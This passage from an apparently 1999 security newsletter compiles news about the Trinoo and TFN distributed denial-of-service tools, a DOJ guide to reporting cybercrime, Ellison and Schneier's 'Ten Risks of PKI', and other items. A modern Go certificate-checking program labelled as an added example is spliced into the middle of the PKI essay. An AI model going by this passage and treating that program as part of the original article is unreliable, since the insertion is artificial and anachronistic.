Zhirinovsky's bloc was running at more than eight percent in early results compared with pre-election opinion polls which had given him some five percent.

Asked by Reuters whether he would have a drink to mark his party's good showing, he said: ``No. No way, we Russians don't drink any more. We now work on computers, we use computers to send viruses to the West and then we poach your money.''

``We have the best hackers in the world. We do not need to drink or smoke...We do not drink, smoke, have drugs and we don't have AIDS, that's what you have got in the West.''

Russia is a heavy drinking nation which is struggling to catch up with economically-advanced countries on the use of new technologies, such as the Internet, but a lack of resources and poor infrastructure confines progress to big cities.
Zhirinovsky, who has run and done reasonably well in all parliamentary and presidential elections since 1991 on a protest vote by lower strata of Russian society, is one of the most eccentric politicians, with an acute political sense and a bizarre sense of humour.

He has thrown juice at an opponent in a live televised debate, promised to wash his boots in the Indian Ocean when Russia expands there and been involved in fist-fighting in the State Duma lower chamber of parliament.

But at the same time, he has decided crucial votes in parliament in the Kremlin's favour and has developed a well organised party with solid assets.

ISN is sponsored by Security-Focus.COM

@HWA

30.0 [ISN] Tribe and Trinoo, two new virulent virii
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: "Noonan, Michael D"

http://news.cnet.com/news/0-1003-200-1501144.html?tag=st.ne.1002.tgif?st.ne.fd.gif.f

Computer security teams brace for attacks
By Stephen Shankland
Staff Writer, CNET News.com
December 20, 1999, 1:30 p.m. PT

Computer security teams are bracing for holiday attacks by two programs that enlist multiple systems to launch coordinated assaults on Web servers.

Concern is mounting that the two malicious programs, called Tribe Flood Network and Trinoo, will show their colors in coming weeks. Experts fear that the holidays are a likely time, because computer administrators on vacation will be harder to locate and likely won't be paying as much attention to systems under their control. In addition, some suggest attackers are likely to strike in the midst of confusion that people expect with the arrival of the Year 2000 computer problem.

Tribe and Trinoo also may be more powerful than previous programs of the same kind. The duo, which started appearing in recent months, "are a step above what has happened before," according to Dave Dittrich, a computer security technician at the University of Washington who wrote analyses of the programs.
When installed onto hundreds or thousands of computers, the programs simultaneously bombard a select point on the Internet. If the information from the attackers comes fast enough, the target computer freezes up.

Flooding attacks such as Tribe and Trinoo are examples of so-called denial-of-service attacks, a method that's been around as long as there have been networks to inundate. And launching attacks from several computers too has been tried before, for example with the "Smurf" attacks of last year.

But Tribe and Trinoo give a new level of control to the attacker, and they are being improved, Dittrich said. Moreover, because the origin of the program is obscured, it's hard to counteract, said Quinn Peyton of the Computer Emergency Response Team (CERT) at Carnegie Mellon University.

"There are machines now sitting there, prepared to attack somebody else," Peyton said. "Now one person can do a massive denial-of-service."

CERT warns that the Trinoo and Tribe attack tools "appear to be undergoing active development, testing and deployment on the Internet."

Tribe Flood Network and Trinoo launch their attacks from a host of innocent computers that already have been broken into. Then, on a signal from a master computer, the computers simultaneously bombard the victim machine with packets of information so fast that it becomes unresponsive. At that point, the target computer won't respond to commands and can't be taken off the network.

To monitor computer attacks and vulnerabilities, the FBI in 1998 set up an office called the National Infrastructure Protection Center (NIPC). Although FBI officials did not comment on the Tribe or Trinoo attacks, the FBI is holding a news conference tomorrow about Y2K issues, a spokesman said.

"There's a lot of paranoia for the Y2K stuff," said David Crawford of the Energy Department's Computer Incident Advisory Capability. CIAC is working hard to prepare a description of how to identify Trinoo and Tribe in the next few days.
"We're looking for a unique signature that will identify these types of attack," he said.

Dittrich might know. He had to respond when 27 computers at his university were among 227 that attacked the University of Minnesota during three days in August. "I was having a hard time finding all the people and getting all the systems cleaned up," he said, and that was just for a small fraction of the systems involved.

"During that time, their network was pretty much unusable for 100,000 users," Dittrich said. "There isn't much of a defense against these denial-of-service attacks."

University of Washington computers also were used for attacks on computers in France, Norway and Australia, he said.

The attack software was installed primarily on computers using Sun Microsystems' Solaris and Linux--both variations of the Unix operating system. To break into those computers, the intruder took advantage of known vulnerabilities that allowed him or her to take almost complete control of a computer then erase his or her tracks, Dittrich said.

"The core message is that people who have systems on the Internet need to know how to deal with them," Dittrich said. "You can't expect your computer to be running for years, like a microwave. It's more like a really expensive car, where you've got to be taking it in for maintenance all the time."

In the attack on the University of Minnesota, 114 of the 227 attacking systems were part of the Internet 2, a higher-speed successor to the current Internet. Using Internet 2 was important, because its higher-speed network can deliver more volleys in the denial-of-service attack.

"Whoever has the bigger pipe wins," Dittrich said.
ISN is sponsored by Security-Focus.COM

@HWA

31.0 [ISN] As New Year nears, threat of Net attack program mounts
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: darek.milewski@us.pwcglobal.com

As New Year nears, threat of Net attack program mounts
By Stephen Shankland
Staff Writer, CNET News.com
December 23, 1999, 4:00 a.m. PT

URL: http://news.cnet.com/category/0-1003-200-1504709.html

A new and potentially more dangerous version of an Internet attack program has been posted just in time for the holidays, and another is on the way.

A new version of a malicious program called the Tribe Flood Network (TFN) is more powerful and harder to detect than an earlier version, according to experts. And an updated sister program called Trinoo is due to be released next week.

Few incidences of their use have been publicly acknowledged, but experts are warning sites to prepare against attacks that may coincide with New Year's. Widely anticipated problems owing to the Y2K computer glitch may provide cover for other mischief.

The program works like this: A TFN attacker secretly embeds software into hundreds of computers. Then, at a selected time, a command is issued that prompts the infected computers to swamp a target Web site or server with messages in a method of attack called "denial of service." The program doesn't damage the "infected" computers or the target, but the sudden flood of messages typically knocks out the target system.

Although it's possible for target computers to protect themselves by ignoring messages from attacking computers, it's hard to identify which computers are attacking--especially when there are hundreds. This fundamental vulnerability of networked computers makes protecting against denial-of-service attacks extremely difficult.

The existence of TFN was reported earlier this week.
The new variant, called TFN2K, is potentially more dangerous in that it can enlist machines based on both the Windows NT and Unix operating systems to deliver the flood of messages, according to Gia Threatte of the Packet Storm Web site, which publishes security-related software so system administrators can protect against attacks and intrusions.

TFN2K also adds the ability to act on a single command, a stealthier mode of operation than the previous version (which required the controller to send a password), and encrypts communications, making the infecting messages harder to detect, Threatte said. Further, TFN2K sends decoy information to throw hunters looking for the source off the scent.

The purported author of the TFN family, who goes by the name "Mixter," sent a version of TFN2K to Packet Storm. Packet Storm said it also expects a new version of Trinoo from Mixter.

With the new software being released now and the "2K" allusion to the new year in the name of the program, it appears that a computer attack could occur during the holidays.

"I don't really think you're going to see any serious attacks using this until New Year's," Threatte said. On Jan. 1, though, people likely will try to "cause a little mischief," she said.

Other security watchers concur. The consensus of a Year 2000 bug workshop at Carnegie Mellon University's Computer Emergency Response Team was that "it is possible that intrusion attempts, viruses and other attacks will be focused on the time around 01 January 2000 under cover of Y2K incidents," CERT said.

CERT has warned, "We are receiving reports of intruders compromising machines and installing distributed systems used for launching packet-flooding denial-of-service attacks."

CERT said that attackers generally gained unauthorized access to these computers through well-known weaknesses, reinforcing the message that system administrators must stay up-to-date on keeping their systems secure.
Detection of attacks and their ultimate source isn't easy. Trinoo and the TFN family obscure the address of the actual attacker by hiding the person in control behind two layers of computers. The attacker lays the groundwork by breaking into several computers, installing master software on some and attack software on others. When it's time for the attack, a message is sent to the master computers, which in turn is relayed to the drone computers that do the attacking by flooding the target with "packets" of information.

Compromised computers that can be infected with the attack software have become a kind of currency, with attackers trading names and information about them over Internet Relay Chat (IRC) discussions, Threatte said.

Threatte defended Packet Storm's philosophy of publishing attack software for all to see. "If we don't make it available, there's no way you can protect against these things," Threatte said. Sprint, for example, recently called upon Packet Storm's information to more quickly fend off an intruder.

Other, more dangerous versions of distributed attack software are circulating, but Packet Storm doesn't have them, so they're harder to detect, Threatte said.

Packet Storm, a five-person group based in Palo Alto, Calif., is no stranger to controversy. It's now owned by security consultants Kroll-O'Gara after being embroiled in a debate with its former home at Harvard University and hacker chronicle site AntiOnline.

Threatte foresees a time when coordinated denial-of-service is more serious. "Distributed attack tools right now are kind of in their infancy," she said.

New improvements could involve a self-replicating "worm" version that would automatically spread the attack software to new computers. After several generations of spreading, the worm could erase itself from the original computers used to launch the worm, severing ties with the true origin.
The worms could monitor several sites on the Internet for a sign that triggers the time and target to attack.

ISN is sponsored by Security-Focus.COM

@HWA

32.0 [ISN] Hackers hack sites to promote hacking hiatus for y2k (!?)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: "James J. Capone"

http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2413687,00.html

Groups ask others to take hiatus in response to government plea.

December 23, 1999

In a seemingly contradictory move, two hacking groups have defaced websites to urge others to refrain from hacking over the New Year's weekend.

"... it is our hope that others will also abstain from defacing, until the Y2K hysteria has settled down."
-- message posted on defaced website

On Tuesday, a group using the handle Verb0 inserted this message into several sites: "Stop hacking for one day, from 31th December 1999 to 1st January 2000." Online games site Echelon Entertainment was among those hit, ZDNN reports.

ISN is sponsored by Security-Focus.COM

@HWA

33.0 [ISN] How to report internet related crime
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: Elias Levy

http://www.usdoj.gov/criminal/cybercrime/reporting.htm

Computer Crime and Intellectual Property Section (CCIPS)

How to Report Internet-Related Crime

Internet-related crime, like any other crime, should be reported to appropriate law enforcement investigative authorities at the local, state, federal, or international levels, depending on the scope of the crime. Citizens who are aware of federal crimes should report them to local offices of federal law enforcement.

Some federal law enforcement agencies that investigate domestic crime on the Internet include: the [1]Federal Bureau of Investigation (FBI), the [2]United States Secret Service, the [3]United States Customs Service, and the [4]Bureau of Alcohol, Tobacco and Firearms (ATF).
Each of these agencies has offices conveniently located in every state to which crimes may be reported. Contact information regarding these local offices may be found in local telephone directories. In general, federal crime may be reported to the local office of an appropriate law enforcement agency by a telephone call and by requesting the "Duty Complaint Agent."

Each law enforcement agency also has a headquarters (HQ) in Washington, D.C., which has agents who specialize in particular areas. For example, the FBI and the U.S. Secret Service both have headquarters-based specialists in computer intrusion (i.e., computer hacker) cases. In fact, the FBI HQ hosts an interagency center, the [5]National Infrastructure Protection Center (NIPC), created just to support investigations of computer intrusions. The NIPC's general number for criminal investigations is 202-324-0303. The U.S. Secret Service's Electronic Crimes Branch may be reached at 202-435-5850.

The FBI and the Customs Service also have specialists in intellectual property crimes (i.e., copyright, software, movie, or recording piracy, trademark counterfeiting). Customs has a nationwide toll-free hotline for reporting at 800-BE-ALERT, or 800-232-2538.

The FBI investigates violations of federal criminal law generally. Certain law enforcement agencies focus on particular kinds of crime. Other federal agencies with investigative authority are the [6]Federal Trade Commission and the [7]U.S. Securities and Exchange Commission.

To determine some of the federal investigative law enforcement agencies that may be appropriate for reporting certain kinds of crime, please refer to the following table:

  Type of Crime                              Appropriate federal investigative
                                             law enforcement agencies
  -----------------------------------------  ------------------------------------------
  Computer intrusion (i.e. hacking)          FBI local office; NIPC (202-324-0303);
                                             U.S. Secret Service local office
  Password trafficking                       FBI local office; NIPC (202-324-0303);
                                             U.S. Secret Service local office
  Copyright (software, movie, sound          FBI local office; if imported, U.S. Customs
  recording) piracy                          Service local office (800-BE-ALERT, or
                                             800-232-2538)
  Theft of trade secrets                     FBI local office
  Trademark counterfeiting                   FBI local office; if imported, U.S. Customs
                                             Service local office (800-BE-ALERT, or
                                             800-232-2538)
  Counterfeiting of currency                 U.S. Secret Service local office; FBI local
                                             office
  Child Pornography or Exploitation          FBI local office; if imported, U.S. Customs
                                             Service local office (800-BE-ALERT, or
                                             800-232-2538)
  Internet fraud                             FBI local office; Federal Trade Commission;
                                             if securities fraud, Securities and
                                             Exchange Commission
  Internet harassment                        FBI local office
  Internet bomb threats                      FBI local office; ATF local office
  Trafficking in explosive or incendiary     FBI local office; ATF local office
  devices or firearms over the Internet

Updated page May 21, 1999

ISN is sponsored by Security-Focus.COM

@HWA

34.0 [ISN] Ten risks of PKI (Public Key Infrastructure)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: "R. A. Hettinga"
Originally To: cryptography@c2.net

Ten Risks of PKI: What You're not Being Told about Public Key Infrastructure

By Carl Ellison and Bruce Schneier

Computer security has been victim of the "year of the..." syndrome. First it was firewalls, then intrusion detection systems, then VPNs, and now certification authorities (CAs) and public-key infrastructure (PKI). "If you only buy X," the sales pitch goes, "then you will be secure." But reality is never that simple, and that is especially true with PKI.

Certificates provide an attractive business model. They cost almost nothing to make, and if you can convince someone to buy a certificate each year for $5, that times the population of the Internet is a big yearly income.
If you can convince someone to purchase a private CA and pay you a fee for every certificate he issues, you're also in good shape. It's no wonder so many companies are trying to cash in on this potential market. With that much money at stake, it is also no wonder that almost all the literature and lobbying on the subject is produced by PKI vendors. And this literature leaves some pretty basic questions unanswered: What good are certificates anyway? Are they secure? For what? In this essay, we hope to explore some of those questions.

Security is a chain; it's only as strong as the weakest link. The security of any CA-based system is based on many links and they're not all cryptographic. People are involved. Does the system aid those people, confuse them or just ignore them? Does it rely inappropriately on the honesty or thoroughness of people? Computer systems are involved. Are those systems secure? These all work together in an overall process. Is the process designed to maximize security or just profit? Each of these questions can indicate security risks that need to be addressed.

Before we start: "Do we even need a PKI for e-commerce?"

Open any article on PKI in the popular or technical press and you're likely to find the statement that a PKI is desperately needed for e-commerce to flourish. This statement is patently false. E-commerce is already flourishing, and there is no such PKI. Web sites are happy to take your order, whether or not you have a certificate.

Still, as with many other false statements, there is a related true statement: commercial PKI desperately needs e-commerce in order to flourish. In other words, PKI startups need the claim of being essential to e-commerce in order to get investors.

There are risks in believing this popular falsehood. The immediate risk is on the part of investors. The security risks are borne by anyone who decides to actually use the product of a commercial PKI.

Risk #1: "Who do we trust, and for what?"
There's a risk from an imprecise use of the word "trust." A CA is often defined as "trusted." In the cryptographic literature, this only means that it handles its own private keys well. This doesn't mean you can necessarily trust a certificate from that CA for a particular purpose: making a micropayment or signing a million-dollar purchase order.

Who gave the CA the authority to grant such authorizations? Who made it trusted? A CA can do a superb job of writing a detailed Certificate Practice Statement, or CPS - all the ones we've read disclaim all liability and any meaning to the certificate - and then do a great job following that CPS, but that doesn't mean you can trust a certificate for your application.

Many CAs sidestep the question of having no authority to delegate authorizations by issuing ID certificates. Anyone can assign names. We each do that all the time. This leaves the risk in the hands of the verifier of the certificate, if he uses an ID certificate as if it implied some kind of authorization. There are those who even try to induce a PKI customer to do just that. Their logic goes: (1) you have an ID certificate, (2) that gives you the keyholder's name, (3) that means you know who the keyholder is, (4) that's what you needed to know. Of course, that's not what you needed to know. In addition, the logical links from 1 to 2, 2 to 3 and 3 to 4 are individually flawed. [We leave finding those as an exercise for the reader.]

Risk #2: "Who is using my key?"

One of the biggest risks in any CA-based system is with your own private signing key. How do you protect it? You almost certainly don't own a secure computing system with physical access controls, TEMPEST shielding, "air wall" network security, and other protections; you store your private key on a conventional computer. There, it's subject to attack by viruses and other malicious programs.
Even if your private key is safe on your computer, is your computer in a locked room, with video surveillance, so that you know no one but you ever uses it? If it's protected by a password, how hard is it to guess that password? If your key is stored on a smart card, how attack-resistant is the card? [Most are very weak.] If it is stored in a truly attack-resistant device, can an infected driving computer get the trustworthy device to sign something you didn't intend to sign?

This matters mostly because of the term "non-repudiation." Like "trusted," this term is taken from the literature of academic cryptography. There it means something very specific: that the digital-signature algorithm is not breakable, so a third party cannot forge your signature. PKI vendors have latched onto the term and used it in a legal sense, lobbying for laws to the effect that if someone uses your private signing key, then you are not allowed to repudiate the signature. In other words, under some digital signature laws (e.g., Utah and Washington), if your signing key has been certified by an approved CA, then you are responsible for whatever that private key does. It does not matter who was at the computer keyboard or what virus did the signing; you are legally responsible.

Contrast this with the practice regarding credit cards. Under mail-order/telephone-order (MOTO) rules, if you object to a line item on your credit card bill, you have the right to repudiate it - to say you didn't buy that - and the merchant is required to prove that you did.

Risk #3: "How secure is the verifying computer?"

The previous section showed that the computer holding or driving the private key needs to be secure. Long keys don't make up for an insecure system because total security is weaker than the weakest component in the system. The same applies to the verifying computer - the one that uses the certificate. Certificate verification does not use a secret key, only public keys.
Therefore, there are no secrets to protect. However, it does use one or more "root" public keys. If the attacker can add his own public key to that list, then he can issue his own certificates, which will be treated exactly like the legitimate certificates. They can even match legitimate certificates in every other field except that they would contain a public key of the attacker instead of the correct one.

It doesn't help to hold these root keys in "root certificates." Such a certificate is self-signed and offers no increased security. The only answer is to do all certificate verification on a computer system that is invulnerable to penetration by hostile code or to physical tampering.

Risk #4: "Which John Robinson is he?"

Certificates generally associate a public key with a name, but few people talk about how useful that association is. Imagine that you receive the certificate of John Robinson. You may know only one John Robinson personally, but how many does the CA know? How do you find out if the particular John Robinson certificate you received is your friend's certificate? You could have received his public key in person or verified it in person (PGP allows this), but more likely you received a certificate in e-mail and are simply trusting that it is the correct John Robinson. The certificate's Common Name will probably be extended with some other information, in order to make it unique among names issued by that one CA. Do you know that other information about your friend? Do you know what CA his certificate should come from?

When Diffie and Hellman introduced public-key cryptography, they proposed a modified telephone directory in which you could find public keys. Instead of name, address, and phone number, it would have name, address, and public key. If you wanted to find John Robinson's public key you would look him up in the directory, get his public key and send him a message for his eyes only using that public key.
This might have worked with the Stanford Computer Science Department phone directory in 1976, but how many John Robinsons are in the New York City phone book, much less in a hypothetical phone book for the global Internet?

We grow up in small families where names work as identifiers. By the time we're 5 years old, we know that lesson. Names work. That is false in the bigger world, but things we learn as toddlers we never forget. In this case, we need to think carefully about names and not blindly accept their value by the 5-year-old's lessons locked into our memories.

Risk #5: "Is the CA an authority?"

The CA may be an authority on making certificates, but is it an authority on what the certificate contains? For example, an SSL server certificate contains two pieces of data of potential security interest: the name of the keyholder (usually a corporate name) and the DNS name for the server. There are authorities on DNS name assignments, but none of the SSL CAs listed in the popular browsers is such an authority. That means that the DNS name in the certificate is not an authoritative statement. There are authorities on corporate names. These names need to be registered when one gets a business license. However, none of the SSL CAs listed in the browsers is such an authority.

In addition, when some server holds an SSL server certificate, it has permission to do SSL. Who granted the authority to an SSL CA to control that permission? Is the control of that permission even necessary? It serves an economic purpose (generating an income stream for CAs) but does it serve a security purpose? What harm is done if an uncertified server were allowed to use encryption? None.

Risk #6: "Is the user part of the security design?"

Does the application using certificates take the user into account or does it concern itself only with cryptography? For example, a normal user makes a decision of whether to shop with a given SSL-protected Web page based on what is displayed on that page.
The certificate is not displayed and does not necessarily have a relation to what is displayed. SSL security does not have the ability to control or even react to the content of the Web page, only its DNS address. The corporate name is not compared to anything the user sees and there are some Web pages whose certificate is for a company that does Web hosting, not for the company whose logo appears on the displayed page. Users can't, and can't be expected to, sort this all out.

Risk #7: "Was it one CA or a CA plus a Registration Authority?"

Some CAs, in response to the fact that they are not authorities on the certificate contents, have created a two-part certification structure: a Registration Authority (RA), run by the authority on the contents, in secure communication with the CA that just issues certificates. Other vendors sell CA machinery directly to the content authority.

The RA+CA model is categorically less secure than a system with a CA at the authority's desk. The RA+CA model allows some entity (the CA) that is not an authority on the contents to forge a certificate with those contents. Of course, the CA would sign a contract promising not to do so, but that does not remove the capability. Meanwhile, since security of a chain is weaker than the weakest link, the RA+CA is less secure than either the RA or the CA, no matter how strong the CA or how good the contract with the CA.

Of course, the model with a CA at the authority's desk (not at the vendor's site) violates some PKI vendors' business models. It's harder to charge for certificates when you sell someone the CA code (or they get it for free, as Open Source).

Risk #8: "How did the CA identify the certificate holder?"

Whether a certificate holds just an identifier or some specific authorization, the CA needs to identify the applicant before issuing the certificate. There was a credit bureau that thought they would get into the CA business.
After all, they had a vast database on people, so, the thinking ran, they should be able to establish someone's identity online with ease. If you want to establish identity online, you can do that provided you have a shared secret with the subject and a secure channel over which to reveal that secret. SSL provides the secure channel. The trouble with a credit bureau serving this role is that in their vast database there is not one secret shared with the subject. This is because credit bureaus are in the business of selling their information to people other than the subject. Worse, because credit bureaus do such a good job at collecting and selling facts about people, others who might have information about a subject are probably hard pressed to find any datum shared with the subject that is not already available through some credit bureau. This puts at risk commercial CAs that use credit bureau information to verify identity on-line; the model just doesn't work.

Meanwhile, having identified the applicant somehow, how did the CA verify that the applicant really controlled the private key corresponding to the public key being certified? Some CAs don't even consider that to be part of the application process. Others might demand that the applicant sign some challenge right there on the spot, while the CA watches.

Risk #9: "How secure are the certificate practices?"

Certificates aren't like some magic security elixir, where you can just add a drop to your system and it will become secure. Certificates must be used properly if you want security. Are these practices designed with solid security reasons, or are they just rituals or imitations of the behavior of someone else? Many such practices and even parts of some standards are just imitations which, when carefully traced back, started out as arbitrary choices by people who didn't try to get a real answer.

How is key lifetime computed? Does the vendor use 1 year, just because that's common?
A key has a cryptographic lifetime. It also has a theft lifetime, as a function of the vulnerability of the subsystem storing it, the rate of physical and network exposure, attractiveness of the key to an attacker, etc. From these, one can compute the probability of loss of key as a function of time and usage. Does the vendor do that computation? What probability threshold is used to consider a key invalid?

Does the vendor support certificate or key revocation? Certificate Revocation Lists (CRLs) are built into some certificate standards, but many implementations avoid them because they seem to be archaic remnants of the newsprint booklets of bad checking account numbers one used to find at the supermarket checkout stand. Like those booklets, CRLs are seen as too big and too outdated to be relevant. However, if CRLs are not used, how is revocation handled? If revocation is handled, how is compromise of a key detected in order to trigger that revocation? Can revocation be retroactive? That is, can a certificate holder deny having made some signature in the past? If so, are signatures dated so that one knows good signatures from suspect ones? Is that dating done by a secure timestamp service?

How long are the generated public keys and why was that length chosen? Does the vendor support 512-bit RSA keys just because they're fast or 2048-bit keys because someone over there in the corner said he thought it was secure?

Does the proper use of these certificates require user actions? Do users perform those actions? For example, when you establish an SSL connection with your browser, there's a visual indication that the SSL protocol worked and the link is encrypted. But who are you talking securely with? Unless you take the time to read the certificate that you received, you don't know.
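Risk #9 asks how key length and lifetime were chosen and whether anyone actually reads the certificate an SSL connection hands back. The Go program below is an added example, not code from Ellison and Schneier's article nor from any vendor it mentions. It builds a throwaway CA and leaf certificate as constructed sample data (the names "Example Hosting CA", "Example Web Hosting Inc", "www.example.com" and "login.example.com", the 1024-bit leaf key and the three-year validity are all assumptions) and then does the reading the article says the user must do: who issued the certificate, whom it names, whether that name is the host the user meant to reach, and whether key length and lifetime satisfy an explicit policy rather than a vendor default.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// Finding is what a relying party learns by actually reading the certificate.
type Finding struct {
	Subject, Issuer string
	KeyBits         int
	Lifetime        time.Duration
	Problems        []string
}

func must[T any](v T, err error) T {
	if err != nil {
		panic(err)
	}
	return v
}
func mkCert(tmpl, parent *x509.Certificate, pub *rsa.PublicKey, signer *rsa.PrivateKey) *x509.Certificate {
	der := must(x509.CreateCertificate(rand.Reader, tmpl, parent, pub, signer))
	return must(x509.ParseCertificate(der))
}

// issue builds a throwaway CA and a leaf for host so the example runs offline;
// the CA name, organization and host are constructed sample data (assumptions).
func issue(host string, leafBits int, lifetime time.Duration) (*x509.Certificate, *x509.CertPool) {
	now := time.Now()
	caKey := must(rsa.GenerateKey(rand.Reader, 2048))
	caTmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: "Example Hosting CA"},
		NotBefore:             now.Add(-time.Hour),
		NotAfter:              now.Add(10 * 365 * 24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign,
	}
	ca := mkCert(caTmpl, caTmpl, &caKey.PublicKey, caKey)
	leafKey := must(rsa.GenerateKey(rand.Reader, leafBits))
	// The subject names the hosting company, not the site owner (cf. Risk #6).
	leaf := mkCert(&x509.Certificate{
		SerialNumber: big.NewInt(2),
		Subject:      pkix.Name{CommonName: host, Organization: []string{"Example Web Hosting Inc"}},
		DNSNames:     []string{host},
		NotBefore:    now.Add(-time.Hour),
		NotAfter:     now.Add(lifetime),
		KeyUsage:     x509.KeyUsageDigitalSignature | x509.KeyUsageKeyEncipherment,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}, ca, &leafKey.PublicKey, caKey)
	roots := x509.NewCertPool()
	roots.AddCert(ca)
	return leaf, roots
}

// inspect does what Risk #9 says the user must do: read who issued the
// certificate and whom it names, check that name against the host actually
// intended, and apply an explicit key-length and lifetime policy.
func inspect(leaf *x509.Certificate, roots *x509.CertPool, intendedHost string, minBits int, maxLife time.Duration) Finding {
	f := Finding{
		Subject:  leaf.Subject.String(),
		Issuer:   leaf.Issuer.String(),
		Lifetime: leaf.NotAfter.Sub(leaf.NotBefore),
	}
	if pub, ok := leaf.PublicKey.(*rsa.PublicKey); ok {
		f.KeyBits = pub.N.BitLen()
	}
	// Verify checks the chain to a trusted root, the validity window and
	// that intendedHost matches a name in the certificate.
	if _, err := leaf.Verify(x509.VerifyOptions{Roots: roots, DNSName: intendedHost}); err != nil {
		f.Problems = append(f.Problems, "chain/name: "+err.Error())
	}
	if f.KeyBits < minBits {
		f.Problems = append(f.Problems, fmt.Sprintf("key: %d-bit RSA is below the %d-bit minimum", f.KeyBits, minBits))
	}
	if f.Lifetime > maxLife {
		f.Problems = append(f.Problems, fmt.Sprintf("lifetime: %v exceeds the %v maximum", f.Lifetime, maxLife))
	}
	return f
}

func main() {
	// Constructed scenario: a 1024-bit key on a three-year certificate,
	// checked against a 2048-bit, one-year policy for two intended hosts.
	leaf, roots := issue("www.example.com", 1024, 3*365*24*time.Hour)
	for _, host := range []string{"www.example.com", "login.example.com"} {
		f := inspect(leaf, roots, host, 2048, 366*24*time.Hour)
		fmt.Printf("%s: subject=%q issuer=%q key=%d bits lifetime=%v\n", host, f.Subject, f.Issuer, f.KeyBits, f.Lifetime)
		for _, p := range f.Problems {
			fmt.Println("  problem:", p)
		}
	}
}
```

Run as is, the first inspection passes the name check but reports the 1024-bit key and the three-year lifetime against the 2048-bit, one-year policy; the second, for a host the certificate does not name, adds a hostname mismatch, which is exactly the case the padlock icon alone never reveals. The policy numbers are parameters on purpose: the article's point is that whoever relies on the certificate should be able to say why those numbers were chosen.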
Even then, you may not know (cf., Risk #4, above) but if you don't even look, it's much like going into a private room with the lights off: you might know that someone else is there and your conversation is private, but until you know who that other person is, you shouldn't reveal any secret information.

Risk #10: "Why are we using the CA process, anyway?"

One PKI vendor employee confided in us a few years ago that they had great success selling their PKI solution, but that customers were still unhappy. After the CA was installed and all employees had been issued certificates, the customer turned to the PKI vendor and asked, "OK, how do we do single sign-on?" The answer was, "You don't. That requires a massive change in the underlying system software."

Single Sign-On (SSO) might be the killer app of PKI. Under SSO, you come into work in the morning, plug in your smart-card, enter the PIN that activates it, and for the rest of the day, you don't have to do any more logins. All of that is handled for you by the SSO mechanism. Attractive isn't it? Of course, it's attractive. Authentication is a pain. Anything we can do to avoid it, we'll jump at.

Unfortunately, the security value of authentication is all but completely defeated by SSO. Authentication is supposed to prove that the user is present at the controlling computer, at the time of the test. Under SSO, when the user has to rush to the washroom, any passing person can walk up to that user's computer and sign on someplace via the SSO mechanism.

So, why are so many jumping at the CA process with such fervor? Do they use certificates out of empty ritual, just because the other guy does and it's the thing to do this year? Do they do it in order to pass the liability buck: to be able to blame the PKI experts if any insecurity sneaks through? We are not that cynical. Our assessment is that security is very difficult, both to understand and to implement.
Busy system administrators and IT managers don't have the time to really understand security. They read the trade press. The trade press, influenced by PKI vendors, sings the praises of PKIs. And PKI vendors know what busy people need: a minimal-impact solution. "Here, buy this one thing and it will make you secure." So that's what they offer. Reality falls far short of this promise, but then, this is a business and the prominent voices are those with something to sell. Caveat emptor.

Bruce Schneier is the author of Applied Cryptography, the Blowfish and Twofish encryption algorithms, and dozens of research papers and articles on cryptography and computer security. He is CTO of Counterpane Internet Security, Inc., a managed security service company offering leading-edge expertise in the fields of intrusion detection and prevention, preemptive threat discovery, forensic research, and organizational IT systems analysis. You can subscribe to his free monthly e-mail newsletter, Crypto-Gram, at http://www.counterpane.com

Carl M. Ellison is a Senior Security Architect for Intel Corporation, with special focus on cryptography, cryptographic access control and public key certificates. Prior to the focus on cryptography, his earlier professional computer science career focused on system design with special emphasis on distributed and networked systems.

ISN is sponsored by Security-Focus.COM

@HWA

35.0 [ISN] Forbes says he'll ditch all crypto export controls
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: Declan McCullagh

http://www.wired.com/news/politics/0,1283,33049,00.html

Forbes, the Privacy Candidate
by Declan McCullagh (declan@wired.com)
11:40 a.m. 17.Dec.1999 PST

WASHINGTON -- If you're the kind of person who frets about ever-eroding privacy rights, Steve Forbes wants to be your president.
In the first campaign speech by any presidential candidate on the topic, the publishing luminary left nothing to the imagination: Voracious databases know more about you than your mother does, and the Clinton administration is particularly to blame.

"Bit by bit, day by day, we are being seduced by politicians promising security as they take away our sovereignty, promising prosperity as they gnaw away at our privacy," Forbes told a crowd at the conservative Free Congress Foundation on Thursday afternoon.

Hearing someone grouse about Bill Clinton and Al Gore at a Free Congress Foundation event is about as remarkable as a Macy's post-holiday sale, but Forbes' plan to muzzle federal infocrats is one that even the ACLU can cheer.

[...]

Much of Forbes' speech was devoted to how the executive branch is "engaged in the greatest assault" on privacy in the history of the United States, a claim the Clinton administration dismissed on Friday as campaign hyperbole.

[...]

@HWA

36.0 [ISN] Zyklon claims his crime was "no big deal"
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.techserver.com/noframes/story/0,2294,500060584-500100049-500415296-0,00.html

WASHINGTON (November 22, 1999 8:10 p.m. EST http://www.nandotimes.com) - At age 19, hacker Eric Burns has already wandered the underpinnings of the Web where few had gone before, including an illicit visit inside computers at the White House in May.

"I didn't really think it was too much of a big deal," said Burns - hacker name Zyklon - who admitted responsibility for some of the most sensational attacks on corporate and government Internet sites.

Burns pleaded guilty Friday in U.S. District Court in Alexandria, Va., to a single felony count of intentionally hacking into one computer, but admitted involvement in the spate of electronic assaults. Now Burns is facing 15 months in federal prison and $36,240 in restitution.
